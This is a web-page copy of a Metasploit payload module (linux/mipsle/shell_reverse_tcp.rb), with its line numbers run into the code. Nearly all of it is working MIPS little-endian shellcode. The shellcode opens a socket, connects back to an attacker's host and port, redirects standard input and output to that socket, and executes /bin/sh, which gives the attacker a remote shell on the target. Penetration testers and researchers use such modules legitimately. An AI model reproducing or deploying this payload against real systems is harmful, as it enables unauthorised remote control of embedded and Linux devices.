Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
Views: 11781
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 184910include Msf::Payload::Single11include Msf::Payload::Linux12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' =>19[20'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode21'juan vazquez' # Metasploit module22],23'License' => MSF_LICENSE,24'Platform' => 'linux',25'Arch' => ARCH_MIPSLE,26'Handler' => Msf::Handler::ReverseTcp,27'Session' => Msf::Sessions::CommandShellUnix,28'Payload' =>29{30'Offsets' => { },31'Payload' => ''32})33)34end3536def generate(_opts = {})37if( !datastore['LHOST'] or datastore['LHOST'].empty? )38return super39end4041host = Rex::Socket.addr_atoi(datastore['LHOST'])42port = Integer(datastore['LPORT'])4344host = [host].pack("N").unpack("cccc")45port = [port].pack("n").unpack("cc")4647shellcode =48# sys_socket49# a0: domain50# a1: type51# a2: protocol52"\xfa\xff\x0f\x24" + # li t7,-653"\x27\x78\xe0\x01" + # nor t7,t7,zero54"\xfd\xff\xe4\x21" + # addi a0,t7,-355"\xfd\xff\xe5\x21" + # addi a1,t7,-356"\xff\xff\x06\x28" + # slti a2,zero,-157"\x57\x10\x02\x24" + # li v0,4183 # sys_socket58"\x0c\x01\x01\x01" + # syscall 0x404045960# sys_connect61# a0: sockfd (stored on the stack)62# a1: addr (data stored on the stack)63# a2: addrlen64"\xff\xff\xa2\xaf" + # sw v0,-1(sp)65"\xff\xff\xa4\x8f" + # lw a0,-1(sp)66"\xfd\xff\x0f\x34" + # li t7,0xfffd67"\x27\x78\xe0\x01" + # nor t7,t7,zero68"\xe2\xff\xaf\xaf" + # sw t7,-30(sp)69port.pack("C2") + "\x0e\x3c" + # lui t6,0x1f9070port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f9071"\xe4\xff\xae\xaf" + # sw t6,-28(sp)72host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f0173host[0..1].pack("C2") + "\xce\x35" + # ori t6,t6,0x10174"\xe6\xff\xae\xaf" + # sw t6,-26(sp)75"\xe2\xff\xa5\x27" + # addiu a1,sp,-3076"\xef\xff\x0c\x24" + # li t4,-1777"\x27\x30\x80\x01" + # nor a2,t4,zero78"\x4a\x10\x02\x24" + # li v0,4170 # sys_connect79"\x0c\x01\x01\x01" + # syscall 0x404048081# sys_dup282# a0: oldfd (socket)83# a1: newfd (0, 1, 2)84"\xfd\xff\x11\x24" + # li s1,-385"\x27\x88\x20\x02" + # nor s1,s1,zero86"\xff\xff\xa4\x8f" + # lw a0,-1(sp)87"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop88"\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup289"\x0c\x01\x01\x01" + # syscall 0x4040490"\xff\xff\x10\x24" + # li s0,-191"\xff\xff\x31\x22" + # addi s1,s1,-192"\xfa\xff\x30\x16" + # bne s1,s0,68 <dup2_loop>9394# sys_execve95# a0: filename (stored on the stack) "//bin/sh"96# a1: argv "//bin/sh"97# a2: envp (null)98"\xff\xff\x06\x28" + # slti a2,zero,-199"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"100"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"101"\xec\xff\xaf\xaf" + # sw t7,-20(sp)102"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"103"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"104"\xf0\xff\xae\xaf" + # sw t6,-16(sp)105"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)106"\xec\xff\xa4\x27" + # addiu a0,sp,-20107"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)108"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)109"\xf8\xff\xa5\x27" + # addiu a1,sp,-8110"\xab\x0f\x02\x24" + # li v0,4011 # sys_execve111"\x0c\x01\x01\x01" # syscall 0x40404112113return super + shellcode114end115end116117118